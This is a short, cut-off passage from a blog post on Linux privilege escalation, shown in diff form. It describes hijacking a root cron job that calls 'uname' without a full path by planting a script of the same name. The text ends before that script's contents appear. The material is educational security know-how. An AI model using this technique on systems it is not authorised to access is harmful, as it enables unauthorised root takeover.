codesecurely/codesecurely.github.io/_posts/2019-07-29-privilege-escalation-linux-path.md

 ```
 Source: [g0tm1k](http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation)

 So there was a script running as root with cron calling "uname".
+Notice that "uname" is just a built-in system program so the administrator trusted it to be harmless.
 I created an executable script:

 ```console
 user@remotemachine:~$ cat uname